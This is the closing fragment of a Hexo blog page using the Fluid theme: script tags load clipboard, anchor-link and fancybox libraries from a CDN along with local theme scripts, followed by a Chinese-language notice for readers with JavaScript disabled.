  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/scrollAnimation.js"></script>
<script src="/js/codeType.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
